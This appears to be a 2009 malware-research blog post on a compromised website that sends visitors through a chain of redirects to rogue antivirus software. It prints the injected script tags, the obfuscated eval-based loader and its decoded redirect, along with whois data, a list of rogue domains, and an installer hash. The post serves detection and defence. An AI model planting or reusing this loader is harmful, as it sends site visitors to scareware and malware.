29
Jun
09

Javascript redirection to rogue security software installation

post info

By djpnuemo
Categories: Database Update, Infection, Malicious Domains, Malware and Rogue Security Software
0 Comments

The injected contents into the compromised website.

<script src=”vub.js”></script>
<script>hoeyemcs(‘Mnworkforce+Center’);</script>

vub.js

var str=["889", "886", "885", "885", "885", "994", "973", "990", "908", "988", "987", "994", "937", "924", "935", "889", "886", "885", "885", "885", "978", "993", "986", "975", "992", "981", "987", "986", "908", "980", "987", "977", "997", "977", "985", "975", "991", "916", "989", "993", "977", "990", "997", "917", "999", "889", "886", "885", "885", "885", "885", "995", "981", "986", "976", "987", "995", "922", "984", "987", "975", "973", "992", "981", "987", "986", "937", "915", "980", "992", "992", "988", "934", "923", "923", "931", "928", "922", "932", "930", "922", "925", "928", "928", "922", "925", "931", "932", "923", "993", "990", "984", "923", "979", "987", "922", "988", "980", "988", "939", "991", "981", "976", "937", "925", "929", "914", "989", "937", "915", "908", "919", "908", "989", "993", "977", "990", "997", "908", "919", "908", "915", "915", "935", "889", "886", "885", "885", "885", "1001"];
var temp=”;
var gg=”;
for (i=0; i<str.length; i++){
gg=str[i]-876;
temp=temp+String.fromCharCode(gg);
}
eval(temp);

When the javascript rountine is run, it looks like this.

var pov=0;
function hoeyemcs(query){
window.location=’http://74.86.144.178/url/go.php?sid=15&q=’ + query + ”;
}

This causes mutltiple redirections through domains and ulimately to the fake scanning page.

hxxp://74.86.144.178/url/go.php?sid=15&q=
Redirects to
hxxp://dadquox.cn/?wm=70126&q=
Redirects to
hxxp://atuyfe.cn/?wm=70126

Whois entry for atuyfe.cn 195.95.151.174
ROID: 20081230s10001s20184853-cn
Domain Status: clientTransferProhibited
Registrant Organization: null
Administrative Email: dfgsegzhfs@yahoo.com
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server:ns1.pubilcnameserver7.com
Name Server:ns2.pubilcnameserver7.com
Registration Date: 2008-12-30 10:00
Expiration Date: 2009-12-30 10:00

AS40965
EASTNET-UA-AS

acajelu.cn
adayby.cn
adiuqga.cn
ajowah.cn
ajuadeb.cn
akaysu.cn
akipahu.cn
amayrex.cn
amocyux.cn
anamuco.cn
aniuha.cn
ateudny.cn
atiqad.cn
atoacu.cn
atuyfe.cn
countedantiviruspro.com
exeype.cn
ezeunac.cn
ferojaw.cn
fevopru.cn
fexonhu.cn
fidteur.cn
getavplusnow.com
gihugyx.cn
giwgeam.cn
gojaxty.cn
megaantivirusplus.com
nextantivirusplus.com
suxpymi.cn
www.acyikap.cn
www.adiuqga.cn
www.adocyha.cn
www.ajuadeb.cn
www.akaysu.cn
www.anoemyx.cn
www.antivirusplus-ok.com
www.ateudny.cn
www.atoacu.cn
www.exeype.cn
www.fevopru.cn
www.fidteur.cn

installer_70126.exe
Result: 19/41 (46.35%)
MD5: aaead5bc5202b75c8e1553ede907084a
VirusTotal
ThreatExpert Analysis
hxxp://atuyfe.cn/installer_70126.exe

0 Responses to “Javascript redirection to rogue security software installation”

Feed for this Entry Trackback Address View blog reactions
  1. No Comments

Leave a Reply

You must login to post a comment.

« Domains associated with rogue campaigns
Database Update: 31 files (Low/Moderate Detection) »


 

June 2009
M T W T F S S
« May   Jul »
1234567
891011121314
15161718192021
22232425262728
2930